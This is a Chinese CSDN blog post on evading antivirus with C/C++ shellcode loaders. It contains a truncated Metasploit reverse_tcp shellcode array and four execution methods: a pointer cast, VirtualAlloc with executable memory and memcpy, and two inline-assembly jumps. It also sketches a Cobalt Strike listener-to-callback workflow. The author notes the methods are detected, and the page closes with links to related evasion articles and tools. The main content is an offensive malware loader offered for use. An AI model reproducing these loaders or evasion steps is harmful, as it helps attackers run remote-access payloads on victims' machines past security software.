C/C++免杀--原生态(GG)

最新推荐文章于 2024-07-23 14:38:11 发布
最新推荐文章于 2024-07-23 14:38:11 发布
阅读量529 收藏 4
点赞数 3
分类专栏: # 免杀对抗 文章标签: c语言 c++ 单片机 笔记 网络安全 web安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/139076439
版权

看个热闹吧...

metasploit payload运行原理浅析(sockedi调用约定是什么)

lib/msf/core/payload/windows/reverse_tcp.rb:

metasploit-framework/lib/msf/core/payload/windows/reverse_tcp.rb at master · rapid7/metasploit-framework · GitHub

原生态:

MSF:

#include <Windows.h>
#include <stdio.h>
#include <string.h>

//#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口


unsigned char buf[] = 
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x8b"
.
.
.
.
\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a"
"\x00\x53\xff\xd5";





int main()

{
    
    //四种模式,随机选一种.(都GG)
	((void(WINAPI*)(void))&buf)();
	
	//char* Memory;
    //Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    //memcpy(Memory, buf, sizeof(buf));
    //((void(*)())Memory)();

    //__asm {
    //lea eax,buf
    //call eax
    //}
	
	//__asm{
	//mov eax, offset shellcode
	//_emit 0xFF
	//_emit 0xE0
	//}

}

CS:

cs--创建监听器--生成c的payload--替换payload--编译执行--上线

什么原理?

shellcode生成

msf cs

利用C/C++编译shellcode形成exe上线

shellcode:免杀手段繁多--搞坏的可能性小--自定义更多选择

可执行文件:免杀手段单一--搞坏的可能性大


MSF 源码地址reverse_tcp.rb

源码shellcode上线逻辑

金灰
关注
专栏目录
如何利用十行C++代码,绕过杀毒软件实现免杀
03-17 2857
我相信大部分的读者都会同意这个观点,绕过大部分杀毒软件的基本方法都很平常没什么特殊的。然而,我也偶尔会遇到一些人仅仅依靠工具生成二进制文件,这些文件很容易被杀毒软件通过指纹标记出来。本文主要是为这些人所准备的。 下面是小编整理好的一套C/C++资料,加小编C/C++编程学习群825414254,获取系统性学习C/C++的学习资料 在我们开始接触这段小巧的 C++ 代码前,我想先介绍一个可以非常...
CSDN前1000名博主
热门推荐
无知人生,记录点滴
05-26 8万+
博主 简介 stpeace 排名:1 原创:2166 粉丝:7180 积分:181660 等级:10stpeace的专栏中国本博客供大家交流,欢迎各抒己见。博文中的内容禁止用 yuanmeng001 排名:2 原创:5286 粉丝:10660 积分:170616 等级:10袁萌专栏无穷小微积分倡导者–北大教授null老师 yjclsx 排名:3 原创:162...
C++免杀
weixin_33866037的博客
10-31 370
假设我们的特征码定位在MessageBoxA函数的地址(只是举个例子,一般这个函数不会被杀,其他函数也类似方法)那么我们到源码里面发现,我们在PrintMsg函数中调用了这个API函数,那么我们就要对他进行处理。对于输入表被查杀我们一般的处理方法是修改函数的调用方式,比如采用dll动态调用,通过上图,我们知道我们是以非unicode方式编译的MessageBox,他对应的非Unicode的函数为M...
网络安全】简单的免杀方法(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Button12138的博客
07-23 768
小七免杀工具包里有很多的工具我就列出其中的一些常用的排名不分前后1、mycclMyccl作为05出品的一款定位工具,到现在还是独领风骚,实用性五星,稳定性五星。2、C32asm一款非常好的静态反汇编工具一般人免杀定位出特征码后都会先到C32里面去改,如果不行就载入od。当然,源码免杀就直接看定位出的东西在源码所对应的代码修改就ok。3、OD作为一款神器,OD有很多作用,破解,免杀啊,都需要它,做免杀不必要学汇编,通读几遍80×86就差不多了4、LordPE。
远控免杀从入门到实践(3)-代码篇-C/C++
weixin_46236101的博客
03-13 1964
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀从入门到实践》系列文章目录: 1、远控免杀从入门到实践 (1)基础篇 2、远控免杀从入门到实践 (2)工具总结篇 3、远控免杀从入门到实践 (3)代码篇-C/C++ 4、远控免杀从入门到实践 (4)代码篇-C# 5、远控免杀从入门到实践 (5)代码篇-Python 6、远控免杀从入门到实践 (6)代码篇-Powershell 7、远控免杀从入门到实.
C/C++ 实现切片免杀的思路
CSDN
10-20 1万+
今天突然想到了一个好玩的免杀思路,原理就是想办法切断磁盘特征与内存特征,关于沙盒免杀我寻思着,这样可以将不同的的DLL映射到内存,在内存中他们的特征也是被切断的,在注入器上做判断如果是沙盒则不加载,不是则分别注入三个甚至是更多的DLL,将我们的ShellCode切片力度更细,分配到几百个甚至上千个DLL上面,做成一个链,应该可以,没尝试过,抽空可以试试。 如果我们把粒度变得细致,捕捉特征也会变...
Shellcode免杀对抗(C/C++)
qq_74806534的博客
02-17 2万+
这里便是杀毒软件杀毒的原理,这就是特征,我们只需要将木马程序进行简单的分析,就能得到shell回连的IP地址和端口,如果杀毒软件发现我们的可执行文件是一个木马程序。加载器的作用:由于shellcode是一段可以执行的二进制代码,因此需要开辟出一段可以读写可操作的地址来运行shellcode,而这就是加载器的作用。之后打开.c文件是一个未编译代码,放到上文的编译代码中,注意这里是x64编译,用的方式三,使用.c文件。因为我们的加载器的特征,各平台杀毒软件都有了已经,所有我们就要用新的,特征没有被锁定。
Golang优秀开源项目汇总, 10大流行Go语言开源项目, golang 开源项目全集(golang/go/wiki/Projects), GitHub上优秀的Go开源项目...
weixin_34245082的博客
05-08 6132
  Golang优秀开源项目汇总(持续更新。。。)我把这个汇总放在github上了, 后面更新也会在github上更新。 https://github.com/hackstoic/golang-open-source-projects  。 欢迎fork, star , watch, 提issue。    资料参考来源:http://studygolang.com/projects 监控...
机器学习编译器的前世今生
OneFlow深度学习框架
10-27 9813
我承认,在大学的编译器课上哭了,后来我选择成为一名机器学习工程师,以为再也不用被编译器烦扰。然而,当我逐渐了解ML模型如何投入生产应用,关于编译器的问题不断涌现。在许多用例中,尤其是用边缘设备运行ML模型时,模型的成功与否仍然取决于运行它的硬件(https://hardwarelottery.github.io/)。因此,了解模型的编译和优化,以...
Linux指令整理(从入门到高级)+Shell语法
默主归沙的博客
03-27 2035
一、Linux简介与安装 1.1 计算机的相关概念 1. 什么是计算机 能够接收使用者输入的指令与数据,经由中央处理器的算术与逻辑单元运算处理后,以产生或存储有用的新数据。比如计算器,手机,汽车导航系统,提款机,桌面电脑,手提电脑等。 2. 计算机的硬件组成 计算单元和控制单元(CPU) 输入单元(键盘,鼠标) 输出单元(显示器,打印机) 存储单元(硬盘,u盘,内存条) 3. 操作系统 用来管理计算机硬件和其他软件的计算机程序,没有操作系统的计算机,就是一堆废铁。 常见的PC端操作系统:wi
c++静态免杀修正版
crowsec
05-16 1308
在Github上看到一个c++免杀,在4月6号的时候,还是bypass 很多的,但是一个月过去了,我执行之后发现了只能过火绒。
C++源代码免杀之函数的动态调用
04-28
C++源代码免杀之函数的动态调用 最近也在学着修改Gh0st远控的源代码,源代码免杀起来还是方便、简单、有效和简单点。针对于输入输出表盯的比较紧的杀毒软件,最有效的还是进行函数动态调用。也就是说找到函数的原定义,包括值类型和参数等等,再在调用该函数的地方重新定义这个函数,其实也只是改下函数名而已,下面举个例子:
VC写的加密壳源码,可以免杀作用,代码清晰
12-06
可以对PE进行加密加壳操作,非常好,而且可以免杀,也能叫他免杀壳,里面对PE文件分析比较清晰,可以下去研究一下
最强的免杀软件工具
12-10
最强的免杀软件工具
2018最新免杀
02-26
这是一款免杀壳,2018年2月18日亲测,如不免杀请配合别的手法进行更好的免杀效果。免杀壳只是暂时的,做好去学习一下myccl定位特征码
万能提权工具免杀版本
02-03
万能提权工具按时打算好的卷卡式带卡死 按时打扫打扫打扫打扫
C++,渗透,免杀,过保护
jiopkd2的博客
04-28 228
此星球有很多不错的好东西。
C++源码免杀小记
lbjayo的专栏
02-24 2885
之前发了篇贴子关于特征码免杀的,不过,看回贴都希望发点关于特征码定位的,本人菜鸟一只,平时一点小积累,不敢独藏,写出来分享一下。不废话了,直接 上菜。     源码定位特征码后所需修改的特征码大致有四种:     1、指令 2、字串 3、启发特征 4、函数 (输出表 )。   初步确定特征码后可随意上汇编指令:__asm nop;  花指令。可随意在代码段中添加,无所谓多少。本来花指令就是
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值